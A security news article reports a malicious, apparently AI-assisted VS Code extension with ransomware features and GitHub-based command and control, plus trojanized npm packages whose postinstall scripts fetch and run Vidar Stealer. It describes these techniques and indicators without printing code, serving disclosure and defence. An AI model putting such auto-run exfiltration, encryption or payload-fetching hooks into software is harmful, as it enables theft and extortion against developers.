Vibe-Coded Malicious: Uncovering the Dangerous Code Extension with Ransomware Features

Cybersecurity Researchers Uncover Malicious VS Code Extension with Ransomware Capabilities

A recent discovery by cybersecurity researchers has brought to light a malicious Visual Studio Code (VS Code) extension that possesses basic ransomware capabilities. What sets this extension apart is that it appears to have been developed with the assistance of artificial intelligence, a technique known as vibe-coding.

John Tuckner, a researcher at Secure Annex, was the first to flag the extension named “susvsex.” Interestingly, the extension does not make any efforts to conceal its malicious intent. Uploaded on November 5, 2025, by a user going by the name “suspublisher18,” the extension came with a simple description – “Just testing,” and an email address “donotsupport@example[.]com.”

The extension’s description reveals its functionality – “Automatically zips, uploads, and encrypts files from C:UsersPublictesting (Windows) or /tmp/testing (macOS) on first launch.” Microsoft promptly intervened on November 6 to remove the extension from the official VS Code Extension Marketplace.

According to details provided by “suspublisher18,” the extension is programmed to activate itself automatically in response to any event, including installation or launching of VS Code. It triggers a function called “zipUploadAndEncrypt,” which creates a ZIP archive of a specified directory, sends it to a remote server, and replaces the original files with encrypted versions.

Tuckner reassures that the targeted directory is currently a test staging area, minimizing the impact. However, he warns that the directory can easily be updated with a new extension release or through commands sent via the C2 channel.

GitHub Utilized as Command-and-Control (C2) Server

In addition to encryption, the malicious extension leverages GitHub as its command-and-control (C2) server by monitoring a private GitHub repository for new commands to execute. The commands are extracted from the “index.html” file, and the results of their execution are written back to the same repository in the “requirements.txt” file using a GitHub access token embedded within the code.

The GitHub account linked to the repository, aykhanmv, remains active, with the purported developer claiming to be based in Baku, Azerbaijan.

Vidar Infostealer Distributed Through Trojanized npm Packages

Meanwhile, Datadog Security Labs uncovered 17 npm packages that masquerade as legitimate software development kits (SDKs) but covertly deploy the Vidar Stealer on compromised systems. This marks the first instance of the information stealer being disseminated via the npm registry.

Identified under the name MUT-4831, these packages were initially flagged on October 21, 2025, with subsequent uploads traced to the following day and October 26. The packages were published by accounts under the names “aartje” and “saliii229911.” Some of the package names include abeya-tg-api, bael-god-admin, cursor-ai-fork, and more.

Although the associated accounts have been banned, these libraries were downloaded at least 2,240 times before their removal. Datadog suspects that many of these downloads could have been automated.

The attack methodology involves a postinstall script specified in the “package.json” file that fetches a ZIP archive from an external server (bullethost[.]cloud domain) and executes the Vidar executable contained within. Some variations utilize a post-install PowerShell script within the package.json file to download the ZIP archive before passing control to a JavaScript file for further execution.

The discovery underscores the ongoing threat of supply chain attacks targeting open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. Developers are advised to exercise caution, review changelogs, and remain vigilant against techniques such as typosquatting and dependency confusion when installing packages.